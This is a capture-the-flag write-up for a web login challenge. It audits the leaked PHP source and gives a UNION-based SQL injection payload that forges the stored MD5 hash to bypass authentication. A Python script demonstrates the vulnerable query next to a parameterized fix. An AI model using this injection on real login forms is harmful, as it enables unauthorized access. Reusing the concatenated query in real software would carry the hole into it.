Duel Field - Experiment with WEB Program Logic Problems

Topic link: http://www.shiyanbar.com/ctf/62


Clicking the topic link brings up a login-like interface:


Following the idea from the previous challenge ("Can you log in?"), we guess that the backend code looks like:

select * from user where username='str' and password='pastr'

We try entering '=' in both the username and password fields, but that does not work, so we need a different approach.

The usual starting point is to inspect the request and response headers and view the page source.

Looking at the source, I found something surprising:


The source contains an unclosed <a> tag that is not rendered properly on the front-end page. Following the link reveals PHP code, so the challenge turns, for now, into a PHP code audit:


Reading the PHP code carefully shows how the backend works. It takes the front-end Username value and the MD5 hash of the Password value, looks up the password stored for that username with a SQL query, and then compares the stored value with the MD5 hash of the submitted Password. The query is:

select pw from php where user='$user'

This statement is obviously SQL-injectable and has no filtering at all. All we need is for this query to return a value equal to the MD5 hash of the Password we submit. So the idea is to close the quotation mark, append a union select, and comment out the rest with #:

username: Username' union select md5(1) #

password: 1

The flag comes out easily:
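As an added illustration (not part of the original writeup or the challenge's own code), the following Python script emulates the backend logic described above with SQLite: a login check that pastes the username into the query, which the union payload above defeats, beside a parameterized version that treats the same input as a plain username and rejects it. Table and column names (php, user, pw) follow the query shown above; the stored account is constructed sample data, the md5() SQL function is registered by hand because SQLite lacks one, and the trailing comment uses '-- ' because SQLite does not recognise MySQL's '#'.

```python
import hashlib
import sqlite3


def md5_hex(value) -> str:
    """Hex MD5 digest, mirroring MySQL's md5() (which stringifies its argument)."""
    return hashlib.md5(str(value).encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the challenge database (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no md5(); register one so md5(1) inside a UNION behaves as in MySQL.
    conn.create_function("md5", 1, md5_hex)
    conn.execute("CREATE TABLE php (user TEXT, pw TEXT)")
    conn.execute("INSERT INTO php VALUES (?, ?)",
                 ("admin", md5_hex("constructed-secret")))
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    """Backend logic as the writeup describes it: the username is concatenated
    into the query and the stored pw is compared with md5(password)."""
    sql = "select pw from php where user='%s'" % username  # no escaping at all
    row = conn.execute(sql).fetchone()
    # A UNION in the username decides what 'pw' is, so the attacker controls
    # both sides of this comparison.
    return row is not None and row[0] == md5_hex(password)


def login_fixed(conn, username: str, password: str) -> bool:
    """Same check with a bound parameter: the quote and UNION stay inside the
    username string and simply match no row."""
    row = conn.execute("select pw from php where user=?", (username,)).fetchone()
    return row is not None and row[0] == md5_hex(password)


# The writeup's payload, with SQLite's comment marker in place of MySQL's '#'.
PAYLOAD_USER = "Username' union select md5(1) -- "
PAYLOAD_PASS = "1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD_USER, PAYLOAD_PASS))  # True
    print("fixed:     ", login_fixed(db, PAYLOAD_USER, PAYLOAD_PASS))       # False
```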

